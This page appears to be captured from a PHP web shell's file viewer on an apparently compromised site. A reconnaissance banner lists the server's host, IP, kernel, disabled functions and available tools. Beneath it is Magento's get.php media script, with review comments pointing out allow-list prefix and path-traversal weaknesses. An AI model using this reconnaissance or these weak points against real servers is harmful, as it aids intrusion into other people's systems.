Kernel : Linux vmw02p.internet-indee.net 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Tue Nov 16 14:42:35 UTC 2021 x86_64
Disable function : NONE
Safe mode : OFF
Host : firofichi.it | Server ip : 5.196.164.15 | Your ip : 18.188.168.78 | Time @ Server : 19 Oct 2024 07:18:18
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON



File Path : /home/webmaster/massimoborgia/test/pub/get.php

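<?php
/**
 * Public media files entry point
 *
 * Serves a requested media file directly when the cached resource config is
 * fresh and the file already exists on disk; otherwise boots the application
 * so that the Media app can materialize the file.
 *
 * Copyright © Magento, Inc. All rights reserved.
 * See COPYING.txt for license details.
 */

use Magento\Framework\App\Cache\Frontend\Factory;
use Magento\Framework\App\ObjectManagerFactory;
use Magento\Framework\HTTP\PhpEnvironment\Request;
use Magento\Framework\Stdlib\Cookie\PhpCookieReader;

require dirname(__DIR__) . '/app/bootstrap.php';

$mediaDirectory = null;
$allowedResources = [];
$configCacheFile = BP . '/var/resource_config.json';

/**
 * Allow-list check: true when $resource starts with any allowed entry.
 *
 * The comparison is a case-insensitive prefix match (stripos() === 0).
 * NOTE(review): being a pure prefix match, an entry without a trailing
 * separator also matches sibling names that share the prefix, and on PHP 8+
 * an empty-string entry matches every path. Confirm that the code writing
 * resource_config.json never emits such entries.
 *
 * @param string $resource         Requested path relative to the media directory
 * @param array  $allowedResources Allowed path prefixes
 * @return bool
 */
$isAllowed = function ($resource, array $allowedResources) {
    foreach ($allowedResources as $allowedResource) {
        if (0 === stripos($resource, $allowedResource)) {
            return true;
        }
    }
    return false;
};

$request = new \Magento\MediaStorage\Model\File\Storage\Request(
    new Request(
        new PhpCookieReader(),
        new Magento\Framework\Stdlib\StringUtils()
    )
);

// Request-derived and therefore untrusted.
// NOTE(review): this script performs no '..' normalisation itself; any such
// filtering would have to happen inside the Request wrapper, which is not
// visible here - confirm before relying on the path concatenation below.
$relativePath = $request->getPathInfo();

if (file_exists($configCacheFile) && is_readable($configCacheFile)) {
    $config = json_decode(file_get_contents($configCacheFile), true);

    // A truncated or corrupt cache file decodes to null or to a partial array.
    // Treat that as "no usable cache" instead of indexing into it: this avoids
    // PHP warnings (which may disclose filesystem paths when errors are
    // displayed) and a TypeError from $isAllowed() when 'allowed_resources'
    // is not an array. The request then falls through to the application.
    $configIsUsable = is_array($config)
        && isset($config['update_time'], $config['media_directory'], $config['allowed_resources'])
        && is_numeric($config['update_time'])
        && is_array($config['allowed_resources']);

    // Checking update time: the cache is valid for 'update_time' seconds after
    // the file's last modification.
    if ($configIsUsable && filemtime($configCacheFile) + $config['update_time'] > time()) {
        $mediaDirectory = $config['media_directory'];
        $allowedResources = $config['allowed_resources'];

        // Serve file if it's materialized
        if ($mediaDirectory) {
            // Reject anything outside the allow-list before touching the filesystem.
            if (!$isAllowed($relativePath, $allowedResources)) {
                require_once 'errors/404.php';
                exit;
            }

            $mediaAbsPath = $mediaDirectory . '/' . $relativePath;
            if (is_readable($mediaAbsPath)) {
                // Directories are never sent; answer as if the path did not exist.
                if (is_dir($mediaAbsPath)) {
                    require_once 'errors/404.php';
                    exit;
                }

                $transfer = new \Magento\Framework\File\Transfer\Adapter\Http(
                    new \Magento\Framework\HTTP\PhpEnvironment\Response(),
                    new \Magento\Framework\File\Mime()
                );
                $transfer->send($mediaAbsPath);
                exit;
            }
        }
    }
}

// Materialize file in application
$params = $_SERVER;
if (empty($mediaDirectory)) {
    // No usable cached config: boot with an empty deployment config and with
    // cache saving disabled for this request.
    $params[ObjectManagerFactory::INIT_PARAM_DEPLOYMENT_CONFIG] = [];
    $params[Factory::PARAM_CACHE_FORCED_OPTIONS] = ['frontend_options' => ['disable_save' => true]];
}

$bootstrap = \Magento\Framework\App\Bootstrap::create(BP, $params);

/** @var \Magento\MediaStorage\App\Media $app */
$app = $bootstrap->createApplication(
    \Magento\MediaStorage\App\Media::class,
    [
        'mediaDirectory' => $mediaDirectory,
        'configCacheFile' => $configCacheFile,
        'isAllowed' => $isAllowed,
        'relativeFileName' => $relativePath,
    ]
);
$bootstrap->run($app);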